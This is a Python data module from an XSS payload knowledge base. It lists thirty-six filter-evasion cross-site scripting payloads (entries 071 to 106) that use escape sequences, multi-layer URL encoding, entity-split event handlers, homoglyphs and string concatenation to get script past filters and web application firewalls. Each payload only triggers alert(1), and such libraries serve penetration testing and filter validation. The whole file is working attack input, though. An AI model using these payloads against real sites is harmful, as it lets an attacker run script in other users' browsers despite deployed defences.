#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Filter Evasion Core Payloads - Part 3
"""

from typing import Dict

from ..models import PayloadEntry


FILTER_EVASION_CORE_PAYLOADS_PART3: Dict[str, PayloadEntry] = {
    "filter_evasion_071": PayloadEntry(
        payload="<img src=x onerror=alert`1`>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_072": PayloadEntry(
        payload="<iframe onload=alert`1`>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_073": PayloadEntry(
        payload="<script>throw alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_074": PayloadEntry(
        payload="<script>void alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_075": PayloadEntry(
        payload="<script>delete alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_076": PayloadEntry(
        payload="<script>typeof alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_077": PayloadEntry(
        payload="<script>alert(\\x31)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_078": PayloadEntry(
        payload="<script>eval(\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_079": PayloadEntry(
        payload="<script>alert(\\u0031)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_080": PayloadEntry(
        payload="<script>eval(\\u0061\\u006C\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_081": PayloadEntry(
        payload="<script>alert(\\61)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_082": PayloadEntry(
        payload="<script>eval(\\141\\154\\145\\162\\164\\50\\61\\51)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_083": PayloadEntry(
        payload='<img src="x" onerror=alert(1)>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_084": PayloadEntry(
        payload="<img src='x' onerror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_085": PayloadEntry(
        payload="<img src=`x` onerror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_086": PayloadEntry(
        payload="%25253Cscript%25253Ealert(1)%25253C/script%25253E",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_087": PayloadEntry(
        payload="<scr%69pt>alert(1)</scr%69pt>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_088": PayloadEntry(
        payload="<%73cript>alert(1)</%73cript>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_089": PayloadEntry(
        payload="<scrip%74>alert(1)</scrip%74>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_090": PayloadEntry(
        payload="<script>alert(1)<\\/script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_091": PayloadEntry(
        payload="<script><!--//--></script><script>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_092": PayloadEntry(
        payload="<script>//<![CDATA[\nalert(1)\n//]]></script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_093": PayloadEntry(
        payload="<img src=x on&#x65;rror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_094": PayloadEntry(
        payload="<img src=x oner&#114;or=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_095": PayloadEntry(
        payload="<script>ａｌｅｒｔ(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_096": PayloadEntry(
        payload="<script>аlert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_097": PayloadEntry(
        payload="<sCRIPT>alert(1)</sCRIPT>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_098": PayloadEntry(
        payload='<a href="jav&#x0A;ascript:alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_099": PayloadEntry(
        payload='<a href="jav&#x0D;ascript:alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_100": PayloadEntry(
        payload='<img """><script>alert(1)</script>">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_101": PayloadEntry(
        payload="<img '''><script>alert(1)</script>'>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_102": PayloadEntry(
        payload='<script>window["\\x61lert"](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_103": PayloadEntry(
        payload='<script>window["\\u0061lert"](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_104": PayloadEntry(
        payload='<script>top["al"+"ert"](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_105": PayloadEntry(
        payload='<script>self["al"+"ert"](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_106": PayloadEntry(
        payload='<script>frames["al"+"ert"](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
}
